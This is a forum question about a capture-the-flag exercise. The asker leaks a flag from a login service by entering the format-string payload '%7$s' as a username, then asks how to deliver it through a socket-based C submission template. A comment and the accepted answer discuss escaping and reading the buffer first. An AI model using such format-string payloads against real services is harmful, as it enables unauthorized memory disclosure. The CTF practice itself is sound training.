# How to send a string format exploit through socket

Tags: format-string

I'm doing a CTF exercise here:

https://c-wars.acnr.se/download/level2.tgz

There is a docker with the vulnerable service, which I need to found the value of a variable. I was able to do it by the following input:

```
== Login Service 1.0 ==
Username: %7$s
Password: a
Welcome: ACNR{_SERVICE_FLAG_}
```

My issue now is that the submission needs to call a function that is going to send this string by a socket, so I guess I need to escape it. I have tried `%7$s`, but didnt worked.

Submission format can be found at https://c-wars.acnr.se/download/MANUAL.pdf

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include "gamelib.h"
uint32_t main(uint32_t argc, uint8_t ** argv)
{
svc_init();
svc_set(10000);
svc_writeln("gimme flag");
svc_readuntil('}');
return 0;
}
```

Comment: This depends on what actually svc_* functions do. If you can't use your own functions and must use the API, try using "%%7$s" as a string. A double percent string is printed as a single percent character, which would look like "%7$s" in this case.

Comment: How do you know you need to escape it?

Answer (score 0, accepted):

The solution wasn't related to escaping.

Was required to read the buffer before sending the string.

Here is the full solution:

https://github.com/ramonmedeiros/c-wars/tree/master/level2